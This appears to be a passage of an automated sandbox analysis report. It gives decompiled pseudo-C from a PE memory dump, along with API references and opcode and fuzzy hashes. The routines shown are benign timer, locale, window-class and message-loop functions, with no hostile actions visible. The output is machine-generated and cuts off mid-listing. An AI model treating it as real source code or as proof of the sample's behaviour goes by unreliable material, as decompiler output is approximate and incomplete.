                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                • String ID:
                                                                                • API String ID: 2429646606-0
                                                                                • Opcode ID: b04f38ba4defd6c5de64de1a433f38defa01984694019d89562f8b4e7c6d09ea
                                                                                • Instruction ID: a3b23e4da45633cf8d10c80a91931710e342de8fee76660524c995d76fe24a38
                                                                                • Opcode Fuzzy Hash: b04f38ba4defd6c5de64de1a433f38defa01984694019d89562f8b4e7c6d09ea
                                                                                • Instruction Fuzzy Hash: E1F09E7290D1009AC750EB79DE99A4D33E86704395B204D3EB211D72A1DA38D5C48BBD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E0045EE44(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				signed int _v9;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				char _v21;
                                                                                				char _v124;
                                                                                				char _v132;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t145;
                                                                                				intOrPtr _t169;
                                                                                				intOrPtr _t171;
                                                                                				intOrPtr _t172;
                                                                                				intOrPtr _t173;
                                                                                				signed int _t177;
                                                                                				signed int _t184;
                                                                                				intOrPtr _t193;
                                                                                				signed int _t197;
                                                                                				signed int _t204;
                                                                                				intOrPtr _t213;
                                                                                				intOrPtr _t215;
                                                                                				signed int _t224;
                                                                                				signed int _t237;
                                                                                				signed int _t240;
                                                                                				void* _t248;
                                                                                				void* _t252;
                                                                                				signed int _t253;
                                                                                				intOrPtr _t268;
                                                                                				intOrPtr _t284;
                                                                                				void* _t295;
                                                                                				signed int _t297;
                                                                                				intOrPtr _t304;
                                                                                
                                                                                				_v9 = __ecx;
                                                                                				_t253 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t294 = _a8;
                                                                                				_v21 = 0;
                                                                                				E0045FCF8(_v8, __edx, _a8, _t295);
                                                                                				_t145 = _v8;
                                                                                				_t305 =  *(_t145 + 0x1c) & 0x00000010;
                                                                                				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
                                                                                					L5:
                                                                                					__eflags = _t253;
                                                                                					if(_t253 != 0) {
                                                                                						L8:
                                                                                						__eflags = _t253;
                                                                                						if(_t253 != 0) {
                                                                                							L37:
                                                                                							_push(0x45f1ef);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t304;
                                                                                							E00436C60(_v8, _t253, _a4, _t294);
                                                                                							_pop(_t268);
                                                                                							 *[fs:eax] = _t268;
                                                                                							return 0;
                                                                                						}
                                                                                						E0045C76C(_v8,  &_v124);
                                                                                						_t296 =  *_v8;
                                                                                						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
                                                                                						__eflags =  *((char*)(_v8 + 0x28e));
                                                                                						if(__eflags != 0) {
                                                                                							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
                                                                                							if(__eflags == 0) {
                                                                                								_t296 = 0xffc8;
                                                                                								_t237 = E004037B0(_v8, __eflags);
                                                                                								__eflags = _t237;
                                                                                								if(_t237 != 0) {
                                                                                									_t240 = E004350A4(_v8) -  *(_v8 + 0x264);
                                                                                									__eflags = _t240;
                                                                                									 *(_v8 + 0x264) = _t240;
                                                                                								}
                                                                                							}
                                                                                							return E0045D160(_v8, _t253,  &_v124, _t294, _t296);
                                                                                						}
                                                                                						_t259 = _a4;
                                                                                						E0045C710(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
                                                                                						_t169 = _v8;
                                                                                						_t297 = _v20;
                                                                                						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
                                                                                						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
                                                                                							L25:
                                                                                							_t171 = _v8;
                                                                                							__eflags =  *(_t171 + 0x249) & 0x00000001;
                                                                                							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
                                                                                								L31:
                                                                                								_t172 = _v8;
                                                                                								__eflags =  *(_t172 + 0x249) & 0x00000002;
                                                                                								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
                                                                                									__eflags = _v16;
                                                                                									if(_v16 >= 0) {
                                                                                										_t173 = _v8;
                                                                                										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
                                                                                										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
                                                                                											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
                                                                                											if(__eflags <= 0) {
                                                                                												_t177 = _v20;
                                                                                												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
                                                                                												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
                                                                                												E0041295C(_t294,  &_v132, _a4);
                                                                                												_push( &_v132);
                                                                                												_t184 = E004037B0(_v8, __eflags);
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													 *((char*)(_v8 + 0x28e)) = 5;
                                                                                													 *((intOrPtr*)( *_v8 + 0x88))();
                                                                                													E0045D2A0(_v8, _t253, _t294, 0xffa3);
                                                                                													_v21 = 1;
                                                                                													SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L37;
                                                                                							}
                                                                                							__eflags = _v20;
                                                                                							if(_v20 < 0) {
                                                                                								goto L31;
                                                                                							}
                                                                                							_t193 = _v8;
                                                                                							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
                                                                                							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
                                                                                								goto L31;
                                                                                							}
                                                                                							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
                                                                                							if(__eflags > 0) {
                                                                                								goto L31;
                                                                                							}
                                                                                							_t197 = _v16;
                                                                                							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
                                                                                							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
                                                                                							E0041295C(_t294,  &_v132, _a4);
                                                                                							_push( &_v132);
                                                                                							_t204 = E004037B0(_v8, __eflags);
                                                                                							__eflags = _t204;
                                                                                							if(_t204 != 0) {
                                                                                								 *((char*)(_v8 + 0x28e)) = 4;
                                                                                								 *((intOrPtr*)( *_v8 + 0x88))();
                                                                                								E0045D2A0(_v8, _t253, _t294, 0xffa2);
                                                                                								_v21 = 1;
                                                                                								SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t213 = _v8;
                                                                                						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
                                                                                						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
                                                                                							goto L25;
                                                                                						}
                                                                                						_t215 = _v8;
                                                                                						__eflags =  *(_t215 + 0x249) & 0x00000004;
                                                                                						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
                                                                                							 *((char*)(_v8 + 0x28e)) = 1;
                                                                                							SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
                                                                                							__eflags = _v9 & 0x00000001;
                                                                                							if((_v9 & 0x00000001) == 0) {
                                                                                								E0045DDD8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
                                                                                							} else {
                                                                                								E0045DD50(_v8, _t259,  &_v20, _t294);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t284 = _v8;
                                                                                						_t224 = _v20;
                                                                                						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
                                                                                						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
                                                                                							L20:
                                                                                							E0045DDD8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
                                                                                							E0045FDD4(_v8, _t294, _t297);
                                                                                							L21:
                                                                                							E004037B0(_v8, __eflags);
                                                                                							goto L37;
                                                                                						}
                                                                                						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
                                                                                						if(__eflags != 0) {
                                                                                							goto L20;
                                                                                						}
                                                                                						E0045B6B8(_v8);
                                                                                						goto L21;
                                                                                					}
                                                                                					__eflags = _v9 & 0x00000040;
                                                                                					if(__eflags == 0) {
                                                                                						goto L8;
                                                                                					} else {
                                                                                						E004037B0(_v8, __eflags);
                                                                                						goto L37;
                                                                                					}
                                                                                				}
                                                                                				if(E004037B0(_v8, _t305) != 0) {
                                                                                					L3:
                                                                                					 *((intOrPtr*)( *_v8 + 0xc0))();
                                                                                					_t248 = E0045B628(_v8, _t307);
                                                                                					_t308 = _t248;
                                                                                					if(_t248 == 0) {
                                                                                						return E004358D8(_v8, 0, _t308);
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                				_t252 = E0044CA54(_v8);
                                                                                				_t307 = _t252;
                                                                                				if(_t252 != 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L3;
                                                                                			}





































                                                                                0x00000000

                                                                                APIs
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F019
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F104
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F1C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Timer
                                                                                • String ID: @
                                                                                • API String ID: 2870079774-2766056989
                                                                                • Opcode ID: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction ID: 31ec200aa90f8bbc8c52e6f19b9a0b11fb317160e962f7965f8f07b22054e6eb
                                                                                • Opcode Fuzzy Hash: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction Fuzzy Hash: 3AC13D34A00209EFDB10DB99C589BDEB7F5AF44305F2441A6EC04AB392D778AF49DB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E00409C40(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				void* _t41;
                                                                                				signed int _t45;
                                                                                				signed int _t47;
                                                                                				signed int _t49;
                                                                                				signed int _t51;
                                                                                				intOrPtr _t75;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				signed int _t83;
                                                                                				signed int _t92;
                                                                                				intOrPtr _t111;
                                                                                				void* _t122;
                                                                                				void* _t124;
                                                                                				intOrPtr _t127;
                                                                                				void* _t128;
                                                                                
                                                                                				_t128 = __eflags;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_t122 = __edx;
                                                                                				_t124 = __eax;
                                                                                				_push(_t127);
                                                                                				_push(0x409e0a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t127;
                                                                                				_t92 = 1;
                                                                                				E00404320(__edx);
                                                                                				E00409908(GetThreadLocale(), 0x409e20, 0x1009,  &_v12);
                                                                                				if(E00408708(0x409e20, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                					while(1) {
                                                                                						_t41 = E004045D8(_t124);
                                                                                						__eflags = _t92 - _t41;
                                                                                						if(_t92 > _t41) {
                                                                                							goto L28;
                                                                                						}
                                                                                						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                                						asm("bt [0x46b0c0], eax");
                                                                                						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                                							_t45 = E00408C80(_t124 + _t92 - 1, 2, 0x409e24);
                                                                                							__eflags = _t45;
                                                                                							if(_t45 != 0) {
                                                                                								_t47 = E00408C80(_t124 + _t92 - 1, 4, 0x409e34);
                                                                                								__eflags = _t47;
                                                                                								if(_t47 != 0) {
                                                                                									_t49 = E00408C80(_t124 + _t92 - 1, 2, 0x409e4c);
                                                                                									__eflags = _t49;
                                                                                									if(_t49 != 0) {
                                                                                										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                                										__eflags = _t51;
                                                                                										if(_t51 == 0) {
                                                                                											L24:
                                                                                											E004045E0(_t122, 0x409e64);
                                                                                										} else {
                                                                                											__eflags = _t51 != 0x20;
                                                                                											if(_t51 != 0x20) {
                                                                                												E00404500();
                                                                                												E004045E0(_t122, _v24);
                                                                                											} else {
                                                                                												goto L24;
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										E004045E0(_t122, 0x409e58);
                                                                                										_t92 = _t92 + 1;
                                                                                									}
                                                                                								} else {
                                                                                									E004045E0(_t122, 0x409e44);
                                                                                									_t92 = _t92 + 3;
                                                                                								}
                                                                                							} else {
                                                                                								E004045E0(_t122, 0x409e30);
                                                                                								_t92 = _t92 + 1;
                                                                                							}
                                                                                							_t92 = _t92 + 1;
                                                                                							__eflags = _t92;
                                                                                						} else {
                                                                                							_v8 = E0040A988(_t124, _t92);
                                                                                							E00404830(_t124, _v8, _t92,  &_v20);
                                                                                							E004045E0(_t122, _v20);
                                                                                							_t92 = _t92 + _v8;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t75 =  *0x4877f4; // 0x9
                                                                                					_t76 = _t75 - 4;
                                                                                					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                						_t77 = 1;
                                                                                					} else {
                                                                                						_t77 = 0;
                                                                                					}
                                                                                					if(_t77 == 0) {
                                                                                						E00404374(_t122, _t124);
                                                                                					} else {
                                                                                						while(_t92 <= E004045D8(_t124)) {
                                                                                							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                                							__eflags = _t83;
                                                                                							if(_t83 != 0) {
                                                                                								__eflags = _t83 != 0x20;
                                                                                								if(_t83 != 0x20) {
                                                                                									E00404500();
                                                                                									E004045E0(_t122, _v16);
                                                                                								}
                                                                                							}
                                                                                							_t92 = _t92 + 1;
                                                                                							__eflags = _t92;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L28:
                                                                                				_pop(_t111);
                                                                                				 *[fs:eax] = _t111;
                                                                                				_push(E00409E11);
                                                                                				return E00404344( &_v24, 4);
                                                                                			}
























                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409E0A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409C6F
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: eeee$ggg$yyyy
                                                                                • API String ID: 4232894706-1253427255
                                                                                • Opcode ID: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction ID: 1a36ec5943870a74506374bfa0bb250890d6a6f3bc275ed72c2f61215dc1fb70
                                                                                • Opcode Fuzzy Hash: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction Fuzzy Hash: C441E4B47081055BD715EB6AC8816BFB2A6DF84304B64453BE692B33C7EB3C9D02926D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00438E24(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                                                				char _v68;
                                                                                				struct _WNDCLASSA _v108;
                                                                                				intOrPtr _v116;
                                                                                				signed char _v137;
                                                                                				void* _v144;
                                                                                				struct _WNDCLASSA _v184;
                                                                                				char _v188;
                                                                                				char _v192;
                                                                                				char _v196;
                                                                                				int _t47;
                                                                                				void* _t48;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t97;
                                                                                				void* _t98;
                                                                                				intOrPtr* _t100;
                                                                                				void* _t104;
                                                                                
                                                                                				_t98 = __edi;
                                                                                				_t83 = __ebx;
                                                                                				_push(__ebx);
                                                                                				_v196 = 0;
                                                                                				_t100 = __eax;
                                                                                				_push(_t104);
                                                                                				_push(0x438faf);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t104 + 0xffffff40;
                                                                                				_t84 =  *__eax;
                                                                                				 *((intOrPtr*)( *__eax + 0x98))();
                                                                                				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                                                					L7:
                                                                                					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
                                                                                					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                                                					asm("sbb eax, eax");
                                                                                					_t48 = _t47 + 1;
                                                                                					if(_t48 == 0 || E004324CC != _v184.lpfnWndProc) {
                                                                                						if(_t48 != 0) {
                                                                                							UnregisterClassA( &_v68, _v108.hInstance);
                                                                                						}
                                                                                						_v108.lpfnWndProc = E004324CC;
                                                                                						_v108.lpszClassName =  &_v68;
                                                                                						if(RegisterClassA( &_v108) == 0) {
                                                                                							E0040B264(_t83, _t84, _t98, _t100);
                                                                                						}
                                                                                					}
                                                                                					 *0x46b8d0 = _t100;
                                                                                					_t85 =  *_t100;
                                                                                					 *((intOrPtr*)( *_t100 + 0x9c))();
                                                                                					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
                                                                                						E0040B264(_t83, _t85, _t98, _t100);
                                                                                					}
                                                                                					E00408D84( *((intOrPtr*)(_t100 + 0x64)));
                                                                                					 *((intOrPtr*)(_t100 + 0x64)) = 0;
                                                                                					E0043C024(_t100);
                                                                                					E00436848(_t100, E0041EB60( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
                                                                                					_t117 =  *((char*)(_t100 + 0x5c));
                                                                                					if( *((char*)(_t100 + 0x5c)) != 0) {
                                                                                						E004037B0(_t100, _t117);
                                                                                					}
                                                                                					_pop(_t93);
                                                                                					 *[fs:eax] = _t93;
                                                                                					_push(0x438fb6);
                                                                                					return E00404320( &_v196);
                                                                                				} else {
                                                                                					_t83 =  *((intOrPtr*)(__eax + 4));
                                                                                					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
                                                                                						L6:
                                                                                						_v192 =  *((intOrPtr*)(_t100 + 8));
                                                                                						_v188 = 0xb;
                                                                                						_t75 =  *0x486ca0; // 0x41cc64
                                                                                						E00406520(_t75,  &_v196);
                                                                                						_t84 = _v196;
                                                                                						E0040A0EC(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
                                                                                						E00403D80();
                                                                                					} else {
                                                                                						_t97 =  *0x4317f8; // 0x431844
                                                                                						if(E00403740(_t83, _t97) == 0) {
                                                                                							goto L6;
                                                                                						}
                                                                                						_v116 = E0043BD14(_t83);
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                			}





















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction ID: 9ca51f5f29ae1eb14152c1338e28f16d362e04c9e494997458acfa82f7e2cf98
                                                                                • Opcode Fuzzy Hash: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction Fuzzy Hash: 81416D70A003088BDB21EB65C841B9AB7FAAF48304F0445AEE549E7391DB78AD44CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E004099B8(void* __ebx, void* __edi, void* __esi) {
                                                                                				int _v8;
                                                                                				signed int _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				void* _t53;
                                                                                				void* _t54;
                                                                                				intOrPtr _t80;
                                                                                				void* _t83;
                                                                                				void* _t84;
                                                                                				void* _t86;
                                                                                				void* _t87;
                                                                                				intOrPtr _t90;
                                                                                
                                                                                				_t89 = _t90;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(_t90);
                                                                                				_push(0x409acb);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t90;
                                                                                				_v8 = GetThreadLocale();
                                                                                				_t53 = 1;
                                                                                				_t86 = 0x487758;
                                                                                				_t83 = 0x487788;
                                                                                				do {
                                                                                					_t3 = _t53 + 0x44; // 0x45
                                                                                					E0040997C(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
                                                                                					E00404374(_t86, _v16);
                                                                                					_t6 = _t53 + 0x38; // 0x39
                                                                                					E0040997C(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
                                                                                					E00404374(_t83, _v20);
                                                                                					_t53 = _t53 + 1;
                                                                                					_t83 = _t83 + 4;
                                                                                					_t86 = _t86 + 4;
                                                                                				} while (_t53 != 0xd);
                                                                                				_t54 = 1;
                                                                                				_t87 = 0x4877b8;
                                                                                				_t84 = 0x4877d4;
                                                                                				do {
                                                                                					_t8 = _t54 + 5; // 0x6
                                                                                					asm("cdq");
                                                                                					_v12 = _t8 % 7;
                                                                                					E0040997C(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
                                                                                					E00404374(_t87, _v24);
                                                                                					E0040997C(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
                                                                                					E00404374(_t84, _v28);
                                                                                					_t54 = _t54 + 1;
                                                                                					_t84 = _t84 + 4;
                                                                                					_t87 = _t87 + 4;
                                                                                				} while (_t54 != 8);
                                                                                				_pop(_t80);
                                                                                				 *[fs:eax] = _t80;
                                                                                				_push(E00409AD2);
                                                                                				return E00404344( &_v28, 4);
                                                                                			}


















                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00409ACB,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: Dv@$|v@$u@
                                                                                • API String ID: 635194068-2345670339
                                                                                • Opcode ID: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction ID: 09a08a330bd4a45439277aa33b1eaf094ed5bc7a83b6c8959b739365ddb57b32
                                                                                • Opcode Fuzzy Hash: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction Fuzzy Hash: B431B6B1B001086BDB00DA55C891EAF77A9D789314F61843BEA09E7381D73DED4187A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00455CC0(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				char _v8;
                                                                                				char _v9;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				intOrPtr _t36;
                                                                                				long _t41;
                                                                                				intOrPtr _t51;
                                                                                				void* _t55;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr* _t67;
                                                                                				intOrPtr _t68;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				intOrPtr _t76;
                                                                                
                                                                                				_t74 = _t75;
                                                                                				_t76 = _t75 + 0xfffffff0;
                                                                                				_v16 = 0;
                                                                                				_v20 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t74);
                                                                                				_push(0x455dce);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t76;
                                                                                				_t4 =  &_v8; // 0x455438
                                                                                				_t55 = E00455C3C( *_t4);
                                                                                				_t5 =  &_v8; // 0x455438
                                                                                				if( *((char*)( *_t5 + 0x88)) != 0) {
                                                                                					_t7 =  &_v8; // 0x455438
                                                                                					_t51 =  *_t7;
                                                                                					_t79 =  *((intOrPtr*)(_t51 + 0x48));
                                                                                					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
                                                                                						_t9 =  &_v8; // 0x455438
                                                                                						E00456214( *_t9);
                                                                                					}
                                                                                				}
                                                                                				E00453DC8(_t55,  &_v20);
                                                                                				E00432818(_v20, 0,  &_v16, _t79);
                                                                                				_t36 =  *0x487bfc; // 0x22e1310
                                                                                				E00455E7C(_t36, _v16, _t79);
                                                                                				_v9 = 1;
                                                                                				_push(_t74);
                                                                                				_push(0x455d77);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t76;
                                                                                				_t15 =  &_v8; // 0x455438
                                                                                				if( *((short*)( *_t15 + 0xea)) != 0) {
                                                                                					_t18 =  &_v8; // 0x455438
                                                                                					 *((intOrPtr*)( *_t18 + 0xe8))();
                                                                                				}
                                                                                				if(_v9 != 0) {
                                                                                					E00455BD8();
                                                                                				}
                                                                                				_pop(_t66);
                                                                                				 *[fs:eax] = _t66;
                                                                                				_t41 = GetCurrentThreadId();
                                                                                				_t67 =  *0x486dcc; // 0x487030
                                                                                				if(_t41 ==  *_t67 && E0041B790() != 0) {
                                                                                					_v9 = 0;
                                                                                				}
                                                                                				if(_v9 != 0) {
                                                                                					WaitMessage();
                                                                                				}
                                                                                				_pop(_t68);
                                                                                				 *[fs:eax] = _t68;
                                                                                				_push(E00455DD5);
                                                                                				return E00404344( &_v20, 2);
                                                                                			}


















                                                                                APIs
                                                                                  • Part of subcall function 00455C3C: GetCursorPos.USER32 ref: 00455C45
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00455D8C
                                                                                • WaitMessage.USER32(00000000,00455DCE,?,?,?,0046AE10), ref: 00455DAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
